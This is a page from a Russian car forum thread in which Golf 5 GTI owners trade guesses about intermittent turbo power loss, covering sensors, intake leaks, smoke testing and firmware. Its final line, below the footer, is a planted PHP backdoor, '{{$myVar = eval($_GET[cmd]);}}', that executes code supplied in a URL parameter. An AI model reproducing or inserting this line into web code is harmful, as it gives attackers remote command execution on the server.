+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 28

Тема: Плиз хелп турба совсем не турба!)))


  1. #1
    GTI-Racing Crash009 is on a distinguished road Аватар для Crash009
    Регистрация
    15.10.2013
    Откуда
    Казань
    Машина
    Бричка
    Сообщений
    23

    Плиз хелп турба совсем не турба!)))

    всем привет у меня гольф 5 гти на палке не пойму что случилось заводишь едешь тачка не тянет как будто турбине кранты потом глушишь машину заводишь все норм едет чуток. потом опять такая хрень что может быть? официалы толком не могут ничего сказать кроме того мол турбине говорит кранты я спрашиваю откуда инфа они говорят ну мол кроме нее больше нечему!!!замерили компресию вроде норм все датчики и ошибок движка нету!офицалы мочат конешно говорят крыльчатки скорее всего погнуло я говорю блять как погнуло если перезавести и начинает тянуть как надо.сейчас вышел тачку погрел чуток втопил ваще норм все работает минут 30 катался так же работает хз че творит не знаю мб кто знает или сталкивался подскажите плиз!

  2. #2
    GTI-Racing Jahnglist3000 is on a distinguished road Аватар для Jahnglist3000
    Регистрация
    31.10.2012
    Откуда
    GreenCity
    Машина
    VW Golf 5 GTI
    Сообщений
    129
    Какой же угар! Ни одной запятой! :)))

    Бензонасос смотри, фильтр топливный, ТНВД...

    Масло жрет? Турбина свистит, дымит? Если нет, то скорее всего не она
    GTIpower

  3. #3
    GTI-Racing Apofis will become famous soon enough Apofis will become famous soon enough Аватар для Apofis
    Регистрация
    05.08.2012
    Откуда
    СВАО
    Машина
    Q7
    Сообщений
    1,040
    всё ок, наваливай на все бабки - что первое отвалится там и есть проблема )

  4. #4
    GTI-Racing Jahnglist3000 is on a distinguished road Аватар для Jahnglist3000
    Регистрация
    31.10.2012
    Откуда
    GreenCity
    Машина
    VW Golf 5 GTI
    Сообщений
    129
    И вообще, нах официалов, если гарантии нет!
    GTIpower

  5. #5
    GTI-Racing ecko00z is on a distinguished road Аватар для ecko00z
    Регистрация
    06.01.2011
    Откуда
    Москва, Мытищи
    Машина
    GTI mk5 Ed30
    Сообщений
    82
    У меня так тупило когда сдох МАФ

  6. #6
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    Подниму тему,
    Уже год собираюсь с силами перебрать турбину)
    симптомы - масло льётся с патрубков интеркулера и плохо едет. Если немного поездить с газом в пол, то турба как-будто раздувается, и более-менее ехать начинает, а при спокойной езде, как будто бы вообще атмо.
    Ошибок никаких нет, в сервисах обычно глядя на подтёки масла, единогласно "уууу, турбе капец"
    Конкретно на диагностику турбы не ездил, не хочется тратить деньги и услышать тот же самый ответ)
    Вот думаю отдать её на переборку, как минимум из-за того что масло гонит, а потом уж либо поедет, либо дальше копать, по крайней мере будут знать что турбина живая.
    ЗЫ: клапана уже все менял в течении года, особо разницы не заметно.
    Что посоветуете?

  7. #7
    Мимо проходил Wandrys is on a distinguished road Аватар для Wandrys
    Регистрация
    18.05.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    Цитата Сообщение от Kucher9tor Посмотреть сообщение
    Подниму тему,
    Уже год собираюсь с силами перебрать турбину)
    симптомы - масло льётся с патрубков интеркулера и плохо едет. Если немного поездить с газом в пол, то турба как-будто раздувается, и более-менее ехать начинает, а при спокойной езде, как будто бы вообще атмо.
    Ошибок никаких нет, в сервисах обычно глядя на подтёки масла, единогласно "уууу, турбе капец"
    Конкретно на диагностику турбы не ездил, не хочется тратить деньги и услышать тот же самый ответ)
    Вот думаю отдать её на переборку, как минимум из-за того что масло гонит, а потом уж либо поедет, либо дальше копать, по крайней мере будут знать что турбина живая.
    ЗЫ: клапана уже все менял в течении года, особо разницы не заметно.
    Что посоветуете?
    Та же история у меня. Турбину снимал, отвозил в турборемонт- целая, чуть подлатали, но дело не в ней.

    В сервис отвёз- электрики с vag-com смотрели датчики, решили дроссельную заслонку адаптировать- не помогло.

    Ещё есть вариант что на впуске(коллектор или трубки) есть трещина или дыра и при разогреве эта дыра затягиваемся, появляется компрессия. Предложили дым во впуск пустить, но вместо этого дроссельную заслонку адаптировали, потому что д*лб*ебы.

    ПОМОГИТЕ КТО СТАЛКИВАЛСЯ!!!

  8. #8
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    Да тут не ответят)

    Турбину я кстати уже поменял, дело не в ней))
    Частично помогла чистка ДМРВ, датчика давления турбины, чистка впускных клапанов, что-то ещё делал)
    Причем ситуация почти координально изменилась, на холодную, или если проторчать в пробке, катиться на ХХ - валит как надо, а если какое-то время ехать спокойно 2000-2500 об. и захотелось вальнуть, чувствуется что едет не на всю мощность.
    Есть подозрение что дело в прошивке, потому-что перебрал уже почти всё что можно (у меня BSR - уже 10 лет чипу) но 25 рублей платить чисто обновить ПО - неохото :(

    ---------- Сообщение добавлено в 23:56 ---------- Предыдущее сообщение размещено в 23:54 ----------

    Цитата Сообщение от Wandrys Посмотреть сообщение
    Та же история у меня. Турбину снимал, отвозил в турборемонт- целая, чуть подлатали, но дело не в ней.

    В сервис отвёз- электрики с vag-com смотрели датчики, решили дроссельную заслонку адаптировать- не помогло.

    Ещё есть вариант что на впуске(коллектор или трубки) есть трещина или дыра и при разогреве эта дыра затягиваемся, появляется компрессия. Предложили дым во впуск пустить, но вместо этого дроссельную заслонку адаптировали, потому что д*лб*ебы.

    ПОМОГИТЕ КТО СТАЛКИВАЛСЯ!!!
    опресовка дымом - дело хорошее, может где-то воздух подсасывает, появляется разница в показаниях датчиков и мозг не понимает сколько дуть в турбу)
    Мне б тоже не помешала.

  9. #9
    Мимо проходил Wandrys is on a distinguished road Аватар для Wandrys
    Регистрация
    18.05.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    А много куда возил на диагностику?
    Ты мониторь, если найду в чем причину- отпишусь обязательно.
    Насчёт ХХ и спокойной езды- да, то же самое у меня. Больше всего бесит, что до работы ехать 20 минут. И всегда, когда утром хочется вальнуть-взбодриться, он предательски не едет.

  10. #10
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    Цитата Сообщение от Wandrys Посмотреть сообщение
    А много куда возил на диагностику?
    Ты мониторь, если найду в чем причину- отпишусь обязательно.
    Насчёт ХХ и спокойной езды- да, то же самое у меня. Больше всего бесит, что до работы ехать 20 минут. И всегда, когда утром хочется вальнуть-взбодриться, он предательски не едет.
    Реально на диагностику только один раз ездил в ваговский сервис в МСК, отдал 1,5 рубля за диагностику: говорит насос качает, турбина дует, (на сколько достоверные показания без нагрузки, хз...) есть пропуски зажигания, наверно из-за свечей в масле, говорит этот мотор любит крутиться на 4-5 тыщ. При спокойной езде свечи закидывает маслом. Но я впринципе клапан ВКГ удалил, во впуск не должно кидать говнище, тоже как мне показалось положительно сказалось на динамике.
    Попробуй датчик давления турбы промыть спиртом. Надо впуск снять, там самому можно добраться, не сложно. Но если сдохнет, я не виноват)))
    Остальное сам пытаюсь с диагностикой подружиться, и с помощью знакомых в сервисе, которые больше по железу, чем по электрике/ диагностике.

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Турба k03 от CCZB
    от МиФ в разделе Барахолка
    Ответов: 4
    Последнее сообщение: 02.04.2024, 20:11
  2. Турба k03=>k03s
    от fergus в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 59
    Последнее сообщение: 01.10.2023, 14:01
  3. сток турба (IHI) GTI VI
    от Spaceman в разделе Покупка и продажа запчастей
    Ответов: 5
    Последнее сообщение: 07.11.2012, 11:50
  4. Детальки для Г5-Г5 турба
    от roamka в разделе Покупка и продажа запчастей
    Ответов: 6
    Последнее сообщение: 03.02.2012, 01:25

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}